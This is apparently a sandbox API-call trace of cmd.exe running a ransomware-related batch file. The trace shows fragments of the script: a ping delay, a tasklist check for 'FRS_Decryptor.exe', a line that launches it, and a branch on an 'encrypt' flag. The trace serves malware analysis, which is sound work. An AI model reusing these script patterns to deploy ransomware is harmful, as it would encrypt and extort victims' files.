dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0133.319] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0133.319] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0133.319] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0133.319] SetErrorMode (uMode=0x0) returned 0x0 [0133.319] SetErrorMode (uMode=0x1) returned 0x0 [0133.319] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0133.319] SetErrorMode (uMode=0x0) returned 0x1 [0133.319] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.319] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.319] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.319] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0133.319] GetLastError () returned 0x2 [0133.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.319] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a170 [0133.319] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0133.319] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0133.320] GetLastError () returned 0x2 [0133.320] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59bb0 [0133.320] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0133.320] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0133.320] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0133.320] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0133.320] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.320] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.321] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.321] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0133.321] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x154, dwProcessId=0x8e8, dwThreadId=0xbcc)) returned 1 [0133.323] CloseHandle (hObject=0x154) returned 1 [0133.323] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.323] GetEnvironmentStringsW () returned 0xd7e510* [0133.323] FreeEnvironmentStringsA (penv="=") returned 1 [0133.323] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0135.397] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0135.397] CloseHandle (hObject=0x2b0) returned 1 [0135.397] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0135.397] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0135.397] GetEnvironmentStringsW () returned 0xd30508* [0135.397] FreeEnvironmentStringsA (penv="=") returned 1 [0135.397] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0135.397] GetEnvironmentStringsW () returned 0xd7e510* [0135.397] FreeEnvironmentStringsA (penv="=") returned 1 [0135.397] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0135.397] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0135.397] _close (_FileHandle=3) returned 0 [0135.398] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.398] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0135.398] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.398] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0135.398] _get_osfhandle (_FileHandle=0) returned 0x24 [0135.398] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0135.399] SetConsoleInputExeNameW () returned 0x1 [0135.399] GetConsoleOutputCP () returned 0x1b5 [0135.399] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0135.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.399] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0135.400] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0135.400] _get_osfhandle (_FileHandle=3) returned 0x2ec [0135.400] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0135.400] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0135.400] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0135.400] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0135.401] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0135.401] GetFileType (hFile=0x2ec) returned 0x1 [0135.401] _get_osfhandle (_FileHandle=3) returned 0x2ec [0135.401] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0135.401] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0135.401] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0135.401] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0135.401] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0135.401] GetFileType (hFile=0x2ec) returned 0x1 [0135.401] _get_osfhandle (_FileHandle=3) returned 0x2ec [0135.401] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0135.401] _tell (_FileHandle=3) returned 2627 [0135.401] _close (_FileHandle=3) returned 0 [0135.402] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0135.402] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0135.402] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0135.402] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0135.402] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0135.408] feof (_File=0x76ea4c68) returned 0 [0135.408] ferror (_File=0x76ea4c68) returned 0 [0135.408] fgets (in: _Buf=0xd81c28, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0135.872] feof (_File=0x76ea4c68) returned 0 [0135.872] ferror (_File=0x76ea4c68) returned 0 [0135.872] fgets (in: _Buf=0xd85486, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0135.906] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0135.907] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43b46, cbMultiByte=78, lpWideCharStr=0xd43af8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0135.907] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0135.907] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.907] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0135.907] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0135.907] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.907] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0135.908] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] GetFileType (hFile=0x260) returned 0x1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0135.908] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0135.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] GetFileType (hFile=0x260) returned 0x1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0135.908] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0135.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] GetFileType (hFile=0x260) returned 0x1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0135.908] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.908] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.908] GetFileType (hFile=0x260) returned 0x1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.908] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.908] SetFilePointer (in: hFile=0x260, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0135.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0135.909] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.909] GetFileType (hFile=0x260) returned 0x1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0135.909] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0135.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0135.909] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.909] GetFileType (hFile=0x260) returned 0x1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0135.909] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0135.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0135.909] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.909] GetFileType (hFile=0x260) returned 0x1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0135.909] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0135.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0135.909] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.909] GetFileType (hFile=0x260) returned 0x1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0135.909] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0135.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0135.909] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0135.910] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.910] GetFileType (hFile=0x260) returned 0x1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0135.910] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0135.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0135.910] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.910] GetFileType (hFile=0x260) returned 0x1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0135.910] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 